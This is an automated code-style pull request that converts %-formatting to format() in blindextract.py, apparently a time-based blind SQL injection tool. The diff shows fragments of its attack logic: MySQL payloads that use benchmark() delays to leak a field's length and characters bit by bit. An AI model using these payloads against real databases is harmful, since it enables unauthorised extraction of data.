### PR TITLE
Fix "Prefer `format()` over string interpolation operator" issue

### DIFF
--- a/blindextract.py
+++ b/blindextract.py
@@ -27,7 +27,7 @@ def getlength(field,table,where):
 	mintime = measure("select curdate()")
 	
 	for bitpos in bits8:
-		sql = "select if(length(%s) & %d,benchmark(%d,md5('cc')),0) from %s where %s;" % (field,bitpos,iters,table,where)
+		sql = "select if(length({0!s}) & {1:d},benchmark({2:d},md5('cc')),0) from {3!s} where {4!s};".format(field, bitpos, iters, table, where)
 		_time = measure(sql)
 
 		bit = int((_time/mintime) > sensitivity)
@@ -41,7 +41,7 @@ def getbits(pos,field,table,where):
 	mintime = measure("select curdate()")
 	
 	for bitpos in bits8:
-		sql = "select if(ord(substring(%s,%d,1)) & %d,benchmark(%d,md5('cc')),0) from %s where %s;" % (field,pos,bitpos,iters,table,where) 
+		sql = "select if(ord(substring({0!s},{1:d},1)) & {2:d},benchmark({3:d},md5('cc')),0) from {4!s} where {5!s};".format(field, pos, bitpos, iters, table, where) 
 		_time = measure(sql)
 		
 		bit = int((_time/mintime) > sensitivity)
@@ -56,7 +56,7 @@ def getdata(field,table,where):
 	print "length: ",length
 	for i in range(1,length):
 		c = chr(getbits(i,field,table,where))
-		print "CHAR: '%s'" % c
+		print "CHAR: '{0!s}'".format(c)
 		tmp += c
 	return tmp
 


### PR DESCRIPTION
This pull request automatically fixes all occurrences of the following issue:

Issue type: [Prefer `format()` over string interpolation operator](https://www.quantifiedcode.com/app/issue_class/4ACGxFj1)
Issue details: [https://www.quantifiedcode.com/app/project/gh:daedalus:sqlblindextract?groups=code_patterns/%3A4ACGxFj1](https://www.quantifiedcode.com/app/project/gh:daedalus:sqlblindextract?groups=code_patterns/%3A4ACGxFj1)

To adjust the commit message or the actual code changes, just [rebase](https://git-scm.com/docs/git-rebase) or [cherry-pick](https://git-scm.com/docs/git-cherry-pick) the commits.
For questions or feedback reach out to cody@quantifiedcode.com.

Legal note: We won't claim any copyrights on the code changes.

Cheers,
[Cody - Your code quality bot](https://www.quantifiedcode.com/cody)
